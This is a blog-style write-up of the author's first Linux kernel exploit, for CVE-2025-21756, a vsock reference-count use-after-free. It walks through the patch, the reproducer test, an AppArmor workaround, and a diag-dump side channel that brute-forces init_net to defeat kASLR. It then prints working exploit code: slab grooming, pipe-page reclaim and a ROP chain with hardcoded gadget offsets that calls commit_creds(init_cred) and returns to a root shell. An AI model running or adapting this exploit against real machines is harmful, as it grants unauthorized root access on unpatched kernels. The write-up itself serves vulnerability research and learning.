Linux Kernel Exploitation

CVE-2025-21756: Attack of the Vsock

What started off as casual scrolling through the KernelCTF submissions quickly spiraled into a weeks-long deep dive into a deceptively simple patch - and my first root shell from a Linux kernel exploit!

While browsing the public spreadsheet of submissions, I saw an interesting entry: exp237. The patch for the bug seemed incredibly simple, and I was amazed that a researcher had been able to leverage the issue for privilege escalation. So I set off on a journey that would lower my GPA and occasionally leave me questioning my sanity: my first Linux kernel exploit!

Setting up the Environment

Before we can dive into exploit development, we need a good Linux kernel debugging environment. I used QEMU with the scripts from midas's awesome writeup, plus the gef-kernel GDB extensions. I started with Linux kernel 6.6.75 since it was close to the versions exploited by the other researchers. I completed the entire project within WSL so that I could write the exploit on my Windows school computer!

[Screenshot: kernel exploit development environment]

Patch Analysis

As you can see from the patch below, the fix only involves a few lines of code. The code and the commit description show that a transport reassignment can trigger vsock_remove_sock, which calls vsock_remove_bound, which in turn incorrectly decrements the reference counter on a vsock object if the socket was unbound to begin with.

When an object's reference counter reaches zero in the kernel, that object is freed back to its allocator. Ideally, after freeing the vsock object, we can trigger some sort of use-after-free (UAF) to gain a better primitive and escalate privileges.
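
To make the refcount problem concrete, here is a tiny user-space toy model. Everything in it (toy_sock, toy_remove_buggy, and so on) is made up for illustration and is not kernel code, and the "checked" variant is not the actual fix from the patch. It only shows why dropping a reference that the table never took leaves the owner holding a freed object.

```c
#include <assert.h>
#include <stdbool.h>

/* Toy stand-in for a refcounted kernel object; not the real vsock_sock. */
struct toy_sock {
    int  refcnt;    /* live references */
    bool in_table;  /* does a table hold one of those references? */
    bool freed;     /* set once the last reference is dropped */
};

static void toy_hold(struct toy_sock *s) { s->refcnt++; }

static void toy_put(struct toy_sock *s)
{
    assert(s->refcnt > 0);
    if (--s->refcnt == 0)
        s->freed = true;  /* the kernel would hand the memory back here */
}

/* Insert into a table: the table takes its own reference. */
static void toy_insert(struct toy_sock *s)
{
    toy_hold(s);
    s->in_table = true;
}

/* Buggy removal: drops a reference even if the table never held one. */
static void toy_remove_buggy(struct toy_sock *s)
{
    s->in_table = false;
    toy_put(s);
}

/* Careful removal: only drops the reference the table actually owns. */
static void toy_remove_checked(struct toy_sock *s)
{
    if (!s->in_table)
        return;
    s->in_table = false;
    toy_put(s);
}

/* Returns true if the object is freed while its owner still holds it. */
static bool toy_owner_sees_free(bool use_buggy_remove, bool bound)
{
    struct toy_sock s = { .refcnt = 1, .in_table = false, .freed = false };

    if (bound)
        toy_insert(&s);  /* refcnt 1 -> 2 */

    if (use_buggy_remove)
        toy_remove_buggy(&s);
    else
        toy_remove_checked(&s);

    return s.freed;
}
```

Only the combination "buggy removal on an unbound socket" ends with the owner's single reference gone, which is the toy version of the situation the patch description warns about.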

            
--- a/net/vmw_vsock/af_vsock.c
+++ b/net/vmw_vsock/af_vsock.c
@@ -337,7 +337,10 @@ EXPORT_SYMBOL_GPL(vsock_find_connected_socket);
 
 void vsock_remove_sock(struct vsock_sock *vsk)
 {
-	vsock_remove_bound(vsk);
+	/* Transport reassignment must not remove the binding. */
+	if (sock_flag(sk_vsock(vsk), SOCK_DEAD))
+		vsock_remove_bound(vsk);
+
 	vsock_remove_connected(vsk);
 }
 EXPORT_SYMBOL_GPL(vsock_remove_sock);
@@ -821,12 +824,13 @@ static void __vsock_release(struct sock *sk, int level)
 	 */
 	lock_sock_nested(sk, level);
 
+	sock_orphan(sk);
+
 	if (vsk->transport)
 		vsk->transport->release(vsk);
 	else if (sock_type_connectible(sk->sk_type))
 		vsock_remove_sock(vsk);
 
-	sock_orphan(sk);
 	sk->sk_shutdown = SHUTDOWN_MASK;
 
 	skb_queue_purge(&sk->sk_receive_queue);
            
       

Along with this patch, the maintainers also added a test case for the bug, which proved to be a useful starting point for the exploit.

        
#define MAX_PORT_RETRIES	24	/* net/vmw_vsock/af_vsock.c */
#define VMADDR_CID_NONEXISTING	42

/* Test attempts to trigger a transport release for an unbound socket. This can
 * lead to a reference count mishandling.
 */
static void test_seqpacket_transport_uaf_client(const struct test_opts *opts)
{
	int sockets[MAX_PORT_RETRIES];
	struct sockaddr_vm addr;
	int s, i, alen;

	s = vsock_bind(VMADDR_CID_LOCAL, VMADDR_PORT_ANY, SOCK_SEQPACKET);

	alen = sizeof(addr);
	if (getsockname(s, (struct sockaddr *)&addr, &alen)) {
		perror("getsockname");
		exit(EXIT_FAILURE);
	}

	for (i = 0; i < MAX_PORT_RETRIES; ++i)
		sockets[i] = vsock_bind(VMADDR_CID_ANY, ++addr.svm_port,
					SOCK_SEQPACKET);

	close(s);
	s = socket(AF_VSOCK, SOCK_SEQPACKET, 0);
	if (s < 0) {
		perror("socket");
		exit(EXIT_FAILURE);
	}

	if (!connect(s, (struct sockaddr *)&addr, alen)) {
		fprintf(stderr, "Unexpected connect() #1 success\n");
		exit(EXIT_FAILURE);
	}
	/* connect() #1 failed: transport set, sk in unbound list. */

	addr.svm_cid = VMADDR_CID_NONEXISTING;
	if (!connect(s, (struct sockaddr *)&addr, alen)) {
		fprintf(stderr, "Unexpected connect() #2 success\n");
		exit(EXIT_FAILURE);
	}
	/* connect() #2 failed: transport unset, sk ref dropped? */

	addr.svm_cid = VMADDR_CID_LOCAL;
	addr.svm_port = VMADDR_PORT_ANY;

	/* Vulnerable system may crash now. */
	bind(s, (struct sockaddr *)&addr, alen);

	close(s);
	while (i--)
		close(sockets[i]);

	control_writeln("DONE");
}
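
The test above relies on vsock_bind(), a helper from the kernel's vsock selftests that is not shown here. If you want to compile a standalone reproducer, a rough stand-in could look like the sketch below. The names make_vm_addr and vsock_bind_sketch are my own, and the real helper may differ in its details.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>
#include <linux/vm_sockets.h>

/* Fill a sockaddr_vm for the given CID and port. */
static struct sockaddr_vm make_vm_addr(unsigned int cid, unsigned int port)
{
    struct sockaddr_vm addr;

    memset(&addr, 0, sizeof(addr));
    addr.svm_family = AF_VSOCK;
    addr.svm_cid = cid;
    addr.svm_port = port;
    return addr;
}

/* Hypothetical stand-in for the selftest's vsock_bind(): create a vsock
 * socket of the given type and bind it, exiting on failure. */
int vsock_bind_sketch(unsigned int cid, unsigned int port, int type)
{
    struct sockaddr_vm addr = make_vm_addr(cid, port);
    int fd = socket(AF_VSOCK, type, 0);

    if (fd < 0) {
        perror("socket");
        exit(EXIT_FAILURE);
    }
    if (bind(fd, (struct sockaddr *)&addr, sizeof(addr))) {
        perror("bind");
        exit(EXIT_FAILURE);
    }
    return fd;
}
```

With that in place, a call such as vsock_bind_sketch(VMADDR_CID_ANY, VMADDR_PORT_ANY, SOCK_SEQPACKET) plays the role of the vsock_bind() calls in the test.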
        
    

Initial Ideas

With this being a UAF bug, I initially had the idea of attempting a cross-cache attack. My broad plan was as follows...

  1. Trigger the arbitrary free of a vsock object
  2. Reclaim the page with some user controlled object like msg_msg
  3. Corrupt some function pointer in the vsock object to gain code execution

We’ve Got a Panic!

Slightly modifying and running the test code on my VM (see crash.c) actually leads to the kernel panic seen below! Through some debugging, we find that the vsock object is actually still linked into the vsock_bind_table despite being freed. Great!

The panic occurs when AppArmor dereferences a NULL sk_security pointer during a bind() call on the recycled socket. This confirms the UAF and highlights the obstacle posed by LSM hooks (see below).

Roadblock #1: AppArmor + LSM

AppArmor

The first major roadblock we hit is AppArmor. This is seen in the above call stack, where the kernel invokes security_socket_bind and aa_sk_perm. The security_socket_* functions are Linux Security Module (LSM) hooks which call into AppArmor. So why is our socket failing the AppArmor security check?

Investigating the problem, it is apparent that __sk_destruct calls sk_prot_free which calls security_sk_free. So when we trigger our bug to decrement the refcnt and the vsock is freed, the sk->sk_security pointer will be zeroed out.



/**
 * security_sk_free() - Free the sock's LSM blob
 * @sk: sock
 *
 * Deallocate security structure.
 */
void security_sk_free(struct sock *sk)
{
	call_void_hook(sk_free_security, sk);
	kfree(sk->sk_security);
	sk->sk_security = NULL;
}
    

But when we call security_socket_bind, the AppArmor function dereferences this sk->sk_security struct. Worse yet, it seems like almost every socket function has an LSM counterpart. In short: the kernel grants us a dangling pointer to the socket — but AppArmor ensures we crash before we can do anything useful with it. So how can we UAF if we can't even call any useful functions with our recycled socket?


gef> p security_socket_*
security_socket_accept             security_socket_getpeername        
security_socket_bind               security_socket_getpeersec_dgram   
security_socket_connect            security_socket_getpeersec_stream  
security_socket_create             security_socket_getsockname        
security_socket_getsockopt         security_socket_sendmsg
security_socket_listen             security_socket_setsockopt
security_socket_post_create        security_socket_shutdown
security_socket_recvmsg            security_socket_socketpair

We have two main options.

  1. Forge an sk_security pointer to a fake object
  2. Find some functions which aren't protected by AppArmor

I decided to explore option #2 first.

Chinks in the (App)Armor & Defeating kASLR

My first focus was to find a way to leak some addresses. Some "obvious" choices would be functions like getsockopt or getsockname, but these are all protected by AppArmor. Browsing through the source code, I stumbled upon vsock_diag_dump. This function is super interesting because it isn't protected by AppArmor. The code is listed below.


static int vsock_diag_dump(struct sk_buff *skb, struct netlink_callback *cb)
{
	
	// ... snip ...

	/* Bind table (locally created sockets) */
	if (table == 0) {
		while (bucket < ARRAY_SIZE(vsock_bind_table)) {
			struct list_head *head = &vsock_bind_table[bucket];

			i = 0;
			list_for_each_entry(vsk, head, bound_table) {
				struct sock *sk = sk_vsock(vsk);

				if (!net_eq(sock_net(sk), net))
					continue;
				if (i < last_i)
					goto next_bind;
				if (!(req->vdiag_states & (1 << sk->sk_state)))
					goto next_bind;
				if (sk_diag_fill(sk, skb,
						 NETLINK_CB(cb->skb).portid,
						 cb->nlh->nlmsg_seq,
						 NLM_F_MULTI) < 0)
					goto done;
next_bind:
				i++;
			}
			last_i = 0;
			bucket++;
		}

		table++;
		bucket = 0;
	}

	// ... snip ...

}
    

Since our freed socket is still in the bind table, there are only two checks keeping us from dumping some information from the socket. The sk->sk_state check is easy to pass (not requiring any leaks), but the sock_net() check seems tougher. How can we forge the sk->__sk_common.skc_net pointer without having a kASLR leak yet? I was stuck here for around a week, but was able to get past it thanks to help from the community on Discord!
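
The two checks are simple enough to model in user space. The sketch below is a toy (toy_diag_sk and toy_diag_reports are invented names), but it mirrors the logic of the listing: the socket is only reported if its net pointer matches the caller's namespace and its state bit is set in the request mask.

```c
#include <stdbool.h>
#include <stdint.h>

/* Toy view of the two fields vsock_diag_dump() inspects before reporting. */
struct toy_diag_sk {
    uint64_t net;    /* stands in for sk->__sk_common.skc_net */
    uint8_t  state;  /* stands in for sk->sk_state */
};

/* Mirrors the two checks: namespace match, then state bitmask match. */
static bool toy_diag_reports(const struct toy_diag_sk *sk, uint64_t caller_net,
                             uint32_t vdiag_states)
{
    if (sk->net != caller_net)
        return false;
    if (sk->state >= 32)  /* keep the toy shift well defined */
        return false;
    return (vdiag_states & (1u << sk->state)) != 0;
}
```

The important property is that the answer is a single yes or no that depends on an exact pointer match, which is what makes the function usable as an oracle later on.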

Diag Dump Sidechannel For Fun & Profit

Stuck in my tracks, I turned to the kernelCTF community, sharing the above checks on the Discord. Almost immediately, @h0mbre responded with the idea of brute forcing the skc_net pointer, essentially using vsock_diag_dump as a side channel! Brilliant 🤯!

So in summary, we do the following to leak init_net...

  1. Spray pipes to reclaim the UAF'd socket's page

  2. Fill each pipe buffer QWORD-by-QWORD with controlled values

  3. Use vsock_diag_dump() as a side channel to detect if our overwritten struct is “valid enough” to bypass filtering

  4. Once vsock_diag_dump() stops reporting our socket, we know we corrupted skc_net

  5. We then brute force the lower bits of init_net until the socket is accepted again—giving us a full kASLR bypass
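
The code in this post calls a query_vsock_diag() helper that is not shown. A minimal sketch of what such a helper might look like is below. It is my own guess at the shape of it: it sends one sock_diag dump request for AF_VSOCK and returns the size of the first reply. The function names and the "accept every state" mask are assumptions. The value 48 used by the loops in this post is consistent with one netlink header (16 bytes) plus one struct vsock_diag_msg (32 bytes), but that reading is also an inference on my part.

```c
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>
#include <linux/netlink.h>
#include <linux/sock_diag.h>
#include <linux/vm_sockets_diag.h>

/* Size of a reply that carries exactly one reported vsock socket. */
static int one_socket_reply_len(void)
{
    return NLMSG_HDRLEN + (int)sizeof(struct vsock_diag_msg);
}

/* Hypothetical stand-in for query_vsock_diag(): returns the byte count of
 * the first netlink reply to a vsock dump request, or -1 on error. */
int query_vsock_diag_sketch(void)
{
    struct {
        struct nlmsghdr nlh;
        struct vsock_diag_req req;
    } msg;
    char reply[4096];
    int fd, n;

    fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG);
    if (fd < 0)
        return -1;

    memset(&msg, 0, sizeof(msg));
    msg.nlh.nlmsg_len = sizeof(msg);
    msg.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
    msg.nlh.nlmsg_flags = NLM_F_REQUEST | NLM_F_DUMP;
    msg.req.sdiag_family = AF_VSOCK;
    msg.req.vdiag_states = ~0U;  /* assumption: accept every sk_state */

    if (send(fd, &msg, sizeof(msg), 0) < 0) {
        close(fd);
        return -1;
    }
    n = (int)recv(fd, reply, sizeof(reply), 0);
    close(fd);
    return n;
}
```

Comparing the return value against one_socket_reply_len() only works as an oracle if the victim is the sole vsock socket visible in the dump, so treat that as a precondition of this sketch.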

The suggestion by @h0mbre to use pipe backing pages turned out to be way more stable and usable than the msg_msg objects I was using before. With a little bit of work, I got the following code to successfully leak the skc_net pointer. The first step is to groom the slab so that the freed socket's page can be reclaimed.


int junk[FLUSH];
for (int i = 0; i < FLUSH; i++)
    junk[i] = socket(AF_VSOCK, SOCK_SEQPACKET, 0);

puts("[+] pre alloc sockets");
int pre[PRE];
for (int i = 0; i < PRE; i++)
    pre[i] = socket(AF_VSOCK, SOCK_SEQPACKET, 0);

// ... snip ... (alloc target & trigger uaf)

puts("[+] fill up the cpu partial list");
for (int i = 4; i < FLUSH; i += OBJS_PER_SLAB)
    close(junk[i]);

puts("[+] free all the pre/post alloc-ed objects");
for (int i = 0; i < POST; i++)
    close(post[i]);
for (int i = 0; i < PRE; i++)
    close(pre[i]);
    

The pre- and post-allocation of objects ensures that the entire page is actually returned to the buddy allocator (see this writeup). Below is the code to actually find the skc_net pointer.


int pipes[NUM_PIPES][2];
char page[PAGE_SIZE];
memset(page, 2, PAGE_SIZE); // skc_state must be 2

puts("[+] reclaim page");

int w = 0;
int j;
i = 0;
while (i < NUM_PIPES) {

    usleep(100000); // 100 ms pause; sleep(0.1) truncates to sleep(0)

    if (pipe(&pipes[i][0]) < 0) {
        perror("pipe");
        break;
    }

    printf(".");
    fflush(stdout);


    w = 0;
    while (w < PAGE_SIZE) {
        ssize_t written = write(pipes[i][1], page, 8);
        j = query_vsock_diag();
        w += written;
        if (j != 48) goto out; // reply changed: the victim socket is no longer reported
    }
    i++;
    if (i % 32 == 0) puts("");
}
    

As you can see, this code just keeps creating new pipes and populating them one QWORD at a time (0x0202020202020202 to satisfy skc_state) until vsock_diag_dump no longer finds the victim socket. This means that we have overwritten skc_net. Once we have overwritten the pointer, we just need to brute force the lower 32 bits of the address in the same fashion.


long base = 0xffffffff84bb0000; // determined through experimentation
long off = 0;
long addy;
printf("[+] attempting net overwrite (aslr bypass).\n");

while (off < 0xffffffff) {


    close(pipes[i][0]);
    close(pipes[i][1]);

    if (pipe(&pipes[i][0]) < 0) {
        perror("pipe");
    }

    addy = base + off;

    write(pipes[i][1], page, w - 8);
    write(pipes[i][1], &addy, 8);

    if (off % 256 == 0) {
        printf("+");
        fflush(stdout);
    }

    j = query_vsock_diag();
    if (j == 48) {
        printf("\n[*] LEAK init_net @ 0x%lx\n", base + off);
        goto out2;
    }

    off += 128;

}
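
To get a feel for the cost of the brute force, here is a small sketch of the arithmetic. The helper names are mine. It assumes init_net is 128-byte aligned (which the step size of 128 implies) and uses the build-specific offset 0x3bb1f80 that the exploit subtracts further down to recover the kernel base.

```c
#include <assert.h>
#include <stdint.h>

/* Number of failed guesses before the loop reaches `target`, assuming the
 * target is at or above `base` and lies exactly on the probing grid. */
static uint64_t probes_before_hit(uint64_t base, uint64_t target, uint64_t step)
{
    assert(step != 0 && target >= base);
    assert((target - base) % step == 0);  /* otherwise the loop never hits */
    return (target - base) / step;
}

/* Recover the kernel base from a leaked init_net address, using the
 * build-specific offset hardcoded in the exploit. */
static uint64_t kernel_base_from_init_net(uint64_t init_net)
{
    return init_net - 0x3bb1f80ULL;
}
```

For example, with no kASLR slide at all, the target would sit 0x1f80 bytes above the chosen base and the loop would hit after 63 misses. Every extra byte of slide adds 1/128 of a probe, so a large slide means millions of pipe reopen and diag query rounds.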
    

With the skc_net overwrite, we have killed two birds with one stone. We defeat kASLR and land at a known offset in our vsock object.
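
The "known offset" part deserves a quick illustration. The struct below is a hypothetical mirror of the first 56 bytes of struct sock_common as I understand the layout on a 6.6 x86_64 build. It is a sketch, so verify it against your own kernel with pahole before trusting it. It does agree with the exploit code in this post, which treats w - 8 as the start of skc_net and w - 56 as the start of the object.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical mirror of the start of struct sock_common (assumed layout). */
struct toy_sock_common_prefix {
    uint64_t addrpair;      /* skc_daddr + skc_rcv_saddr */
    uint32_t hash;          /* skc_hash */
    uint32_t portpair;      /* skc_dport + skc_num */
    uint16_t family;        /* skc_family */
    uint8_t  state;         /* skc_state */
    uint8_t  reuse_bits;    /* skc_reuse and neighbouring bitfields */
    int32_t  bound_dev_if;  /* skc_bound_dev_if */
    uint64_t bind_node[2];  /* hlist_node: two pointers */
    uint64_t prot;          /* skc_prot, reached as sk->sk_prot */
    uint64_t net;           /* skc_net */
};

/* Given `w`, the number of bytes written into the pipe page when the diag
 * oracle first flipped, return the offset of the socket within that data. */
static size_t object_start_from_w(size_t w)
{
    size_t net_end = offsetof(struct toy_sock_common_prefix, net)
                   + sizeof(uint64_t);

    assert(w >= net_end);
    return w - net_end;
}
```

Under this layout the state byte lives at offset 18, which is why filling the page with 0x02 bytes keeps the state check happy, and skc_prot sits at offset 40, directly below skc_net.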

Now all that is left is to find a reliable way to redirect execution flow...

Controlling RIP

To control the instruction pointer, I turned to the vsock_release function, since it is one of the few pieces of vsock functionality not protected by AppArmor.


static int vsock_release(struct socket *sock)
{
	struct sock *sk = sock->sk;

	if (!sk)
		return 0;

	sk->sk_prot->close(sk, 0);
	__vsock_release(sk, 0);
	sock->sk = NULL;
	sock->state = SS_FREE;

	return 0;
}
    

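We are most interested in the call to sk->sk_prot->close(sk, 0). Since we control sk, we control sk_prot, but the kernel dereferences it to fetch close, so we need a valid pointer to a pointer to a function. This had me stumped for a while, until I started thinking about reusing the other valid proto objects already in the kernel. I found that raw_proto has a pointer to an abort function, raw_abort, shown below. Because close is the first member of struct proto, pointing sk_prot at raw_proto's abort slot (the raw_proto_abort address in the exploit code further down) makes the close lookup land on raw_abort.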


int raw_abort(struct sock *sk, int err)
{
	lock_sock(sk);

	sk->sk_err = err;
	sk_error_report(sk);
	__udp_disconnect(sk, 0);

	release_sock(sk);

	return 0;
}
    

This function calls into sk_error_report, which is shown below.


void sk_error_report(struct sock *sk)
{
	sk->sk_error_report(sk);

	switch (sk->sk_family) {
	case AF_INET:
		fallthrough;
	case AF_INET6:
		trace_inet_sk_error_report(sk);
		break;
	default:
		break;
	}
}
    

So if we can overwrite the sk->sk_error_report field of our socket with a stack pivot gadget, we should be able to jump to a ROP chain starting at the base of the socket.

A nice visualization of the state of the vsock after the overwrite is below.

sk->sk_prot --> &raw_proto
              ↳ .close = raw_abort
                          ↳ sk->sk_error_report(sk) → *stack pivot*
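
Here is the same chain as a user-space toy, in case the double indirection is hard to picture. All names and slot indices are invented. The proto table is modelled as an array of function pointers where slot 0 plays the role of close, and shifting the table pointer so that it starts at the abort slot is my reading of what the raw_proto_abort value in the exploit does.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

struct toy_sk;
typedef int (*proto_slot)(struct toy_sk *sk, int arg);

/* Toy socket: a proto table pointer plus one callback field. */
struct toy_sk {
    const proto_slot *sk_prot;  /* slot 0 is treated as close */
    void (*sk_error_report)(struct toy_sk *sk);
    bool pivoted;
};

enum { SLOT_CLOSE = 0, SLOT_ABORT = 3, SLOT_COUNT = 4 };  /* made-up indices */

static void toy_pivot(struct toy_sk *sk) { sk->pivoted = true; }

static int toy_raw_close(struct toy_sk *sk, int arg)
{
    (void)sk;
    (void)arg;
    return 0;
}

/* Like raw_abort(): ends up invoking the socket's own callback. */
static int toy_raw_abort(struct toy_sk *sk, int err)
{
    (void)err;
    sk->sk_error_report(sk);
    return 0;
}

static const proto_slot toy_raw_proto[SLOT_COUNT] = {
    [SLOT_CLOSE] = toy_raw_close,
    [SLOT_ABORT] = toy_raw_abort,
};

/* Like vsock_release(): blindly calls whatever sits in the close slot. */
static int toy_release(struct toy_sk *sk)
{
    assert(sk->sk_prot != NULL);
    return sk->sk_prot[SLOT_CLOSE](sk, 0);
}

/* Returns true if the attacker-chosen callback ran during release. */
static bool toy_demo(bool shifted)
{
    struct toy_sk sk = {
        .sk_prot = shifted ? &toy_raw_proto[SLOT_ABORT] : toy_raw_proto,
        .sk_error_report = toy_pivot,
        .pivoted = false,
    };

    toy_release(&sk);
    return sk.pivoted;
}
```

With the unshifted table the release path calls the harmless close, and with the shifted pointer the very same call site reaches the callback stored in the socket.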

Another important mention is that it became necessary to forge the sk_lock member with some null bytes and pointers (determined through lots of debugging). With all of this figured out, I constructed the following ROP chain.


long kern_base = base + off - 0x3bb1f80;
printf("[*] leaked kernel base @ 0x%lx\n", kern_base);

// calculate some rop gadgets
long raw_proto_abort = kern_base + 0x2efa8c0;
long null_ptr = kern_base + 0x2eeaee0;
long init_cred = kern_base + 0x2c74d80;
long pop_r15_ret = kern_base + 0x15e93f;
long push_rbx_pop_rsp_ret = kern_base + 0x6b9529;
long pop_rdi_ret = kern_base + 0x15e940;
long commit_creds = kern_base + 0x1fcc40;
long ret = kern_base + 0x5d2;

// info for returning to usermode
long user_cs = 0x33;
long user_ss = 0x2b;
long user_rflags = 0x202;
long shell = (long)get_shell;

uint64_t* user_rsp = (uint64_t*)get_user_rsp();

// return to user mode
long swapgs_restore_regs_and_return_to_usermode = kern_base + 0x16011a6;

//getchar();

printf("[+] writing the rop chain\n");

close(pipes[i][0]);
close(pipes[i][1]);

if (pipe(&pipes[i][0]) < 0) {
    perror("pipe");
}

printf("[+] writing payload to vsk\n");
write(pipes[i][1], page, w - 56);

char buf[0x330];
memset(buf, 'A', 0x330);
char not[0x330];
memset(not, 0, 0x330);

// create the rop chain!
write(pipes[i][1], &pop_rdi_ret, 8); // stack pivot target
write(pipes[i][1], &init_cred, 8);
write(pipes[i][1], &ret, 8); 
write(pipes[i][1], &ret, 8);
write(pipes[i][1], &pop_r15_ret, 8); // junk
write(pipes[i][1], &raw_proto_abort, 8); // sk_prot (calls sk->sk_error_report())
write(pipes[i][1], &ret, 8);
write(pipes[i][1], &commit_creds, 8); // commit_creds(init_cred);
write(pipes[i][1], &swapgs_restore_regs_and_return_to_usermode, 8);
write(pipes[i][1], &null_ptr, 8); // rax
write(pipes[i][1], &null_ptr, 8); // rdi
write(pipes[i][1], &shell, 8); // rip
write(pipes[i][1], &user_cs, 8);
write(pipes[i][1], &user_rflags, 8);
write(pipes[i][1], user_rsp, 8); // rsp
write(pipes[i][1], &user_ss, 8);
write(pipes[i][1], buf, 0x18);
write(pipes[i][1], not, 8); // sk_lock
write(pipes[i][1], not, 8); // sk_lock
write(pipes[i][1], &null_ptr, 8); // sk_lock
write(pipes[i][1], &null_ptr, 8); // sk_lock
write(pipes[i][1], buf, 0x200);
write(pipes[i][1], &push_rbx_pop_rsp_ret, 8); // stack pivot [sk_error_report()]

//getchar();

close(s); // trigger the exploit!
    

Notice that I did not call prepare_kernel_cred(NULL) since this is no longer supported (causes a crash). Instead I opted to call commit_creds with init_cred - a structure with a constant offset from the kernel base possessing uid=gid=0. I also borrowed the swapgs_restore_regs_and_return_to_usermode technique from this blog. With all of those puzzle pieces in place, our exploit gives a root shell!
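
The last five values of the chain before the sk_lock padding (rip, cs, rflags, rsp, ss) form the frame that iretq pops when returning to user mode. A small sketch of that frame as a struct is below. The struct and function names are mine, and the segment and flag constants are simply the ones used in the exploit code above.

```c
#include <assert.h>
#include <stdint.h>

/* The five values iretq pops on x86-64, in ascending stack order. */
struct iret_frame {
    uint64_t rip;
    uint64_t cs;
    uint64_t rflags;
    uint64_t rsp;
    uint64_t ss;
};

/* Build a frame that resumes user mode at `rip` on the stack `user_rsp`. */
static struct iret_frame make_user_frame(uint64_t rip, uint64_t user_rsp)
{
    struct iret_frame f = {
        .rip = rip,
        .cs = 0x33,       /* user code segment used in the post */
        .rflags = 0x202,  /* interrupts enabled, reserved bit 1 set */
        .rsp = user_rsp,
        .ss = 0x2b,       /* user stack segment used in the post */
    };

    assert((user_rsp & 0x7) == 0);  /* sketch assumption: 8-byte aligned */
    return f;
}
```

Writing the struct out in one go is equivalent to the five separate 8-byte writes in the chain, as long as the field order is kept.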

The final source code for the exploit is posted here. The exploit could still be much more reliable and elegant, but for my first kernel pwn I am happy with it!

Thank You!

For a bug involving just a few lines of patch code, this journey taught me way more about the kernel than I ever could have expected! I could never have completed this exploit without all of the super helpful hackers on the #kernelctf Discord channel! Thank you all + happy pwning!